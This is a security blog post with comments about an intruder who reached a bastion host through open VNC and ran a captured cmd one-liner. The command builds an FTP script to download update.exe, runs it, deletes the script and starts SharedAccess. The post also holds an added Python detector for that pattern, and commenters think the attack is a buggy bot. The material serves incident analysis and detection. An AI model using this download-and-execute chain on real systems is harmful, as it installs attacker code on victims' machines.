Anyone seen this?

I've got a bastion host that had VNC wide open. I just got a connection. It fired a ctrl-alt-del, opened a task manager, and ran cmd.exe. It then executed the following command. I was able to get a screen shot before the window disappeared, but it looked like the command was not successful. The attacker disconnected immediately. I have no extra users, but am downloading Helix right now to see if anything really happened. I also have a pcap. But does this look familiar to anyone?

cmd /c net set 21 >> ij &echo user ingenieurisiv aiisiv >> ij &echo binary >> ij &echo get update.exe >> ij &echo bye >> ij &ftp -n -v -s:ij &del ij &update.exe &net start SharedAccess &exit

Author: Xavier Ashe

Entrepreneur, Infosec Executive, CISSP, CISM, Ironman triathlete, traveler, UU, paleo, father of 8, goyishe, gamer, & geek.
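As an added example (not from the post or its comments), here is a small Python detector for the FTP-script downloader pattern in that command line: it splits the cmd chain on "&", pairs the "echo ... >> file" fragments with the "ftp -s:file" that consumes them, and reports what the script fetches, whether it is run, and whether it ever names a host. The function and field names are my own; the sample input is the captured command.

```python
import re
from dataclasses import dataclass

# Constructed sample: the command line captured in the post's screenshot.
CAPTURED_CMDLINE = (
    "cmd /c net set 21 >> ij &echo user ingenieurisiv aiisiv >> ij "
    "&echo binary >> ij &echo get update.exe >> ij &echo bye >> ij "
    "&ftp -n -v -s:ij &del ij &update.exe &net start SharedAccess &exit"
)

@dataclass
class FtpDownloaderFinding:
    script_file: str        # file handed to ftp -s:
    fetched_files: list     # targets of 'get' lines inside that script
    has_open: bool          # does the script ever 'open <host>'?
    executed: bool          # is a fetched file later run in the chain?
    script_deleted: bool    # is the script removed afterwards (anti-forensics)?

def split_cmd_chain(cmdline: str) -> list:
    """Split a 'cmd /c a & b && c' one-liner into its commands (no quoting handled)."""
    body = re.sub(r"^\s*cmd(\.exe)?\s+/c\s+", "", cmdline, flags=re.I)
    return [p.strip() for p in re.split(r"\s*&&?\s*", body) if p.strip()]

def detect_ftp_script_downloader(cmdline: str):
    parts = split_cmd_chain(cmdline)
    # 1. Locate the non-interactive ftp run and the script file it reads.
    script = None
    for p in parts:
        m = re.match(r"ftp\b.*?-s:(\S+)", p, re.I)
        if m:
            script = m.group(1)
    if script is None:
        return None
    # 2. Collect the 'echo <line> >> <script>' fragments that build that script.
    lines = []
    for p in parts:
        m = re.match(r"echo\s+(.*?)\s*>>\s*" + re.escape(script) + r"$", p, re.I)
        if m:
            lines.append(m.group(1))
    if not lines:
        return None
    fetched = [l.split(None, 1)[1] for l in lines if l.lower().startswith("get ")]
    has_open = any(l.lower().startswith("open ") for l in lines)
    executed = any(p.lower() == f.lower() or p.lower().startswith(f.lower() + " ")
                   for f in fetched for p in parts)
    deleted = any(re.match(r"del\b.*\b" + re.escape(script) + r"$", p, re.I) for p in parts)
    return FtpDownloaderFinding(script, fetched, has_open, executed, deleted)
```

Run over the captured line it reports the script "ij", the fetch of update.exe, that update.exe is executed, that the script is deleted, and that no "open" line was ever written, which is why the "net set 21" oddity discussed in the comments leaves the ftp session with no host to connect to.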

0 thoughts on “Anyone seen this?”

  1. Are you sure the first part is correct? “net set 21 >> ij” does not make any sense; I would expect him to specify the ftp host there.


  2. Yeah… we have a screen shot of the attack. It looks like a buggy bot to me. NET SET is not a valid command on XP, and I don't think it's a valid command on any OS.

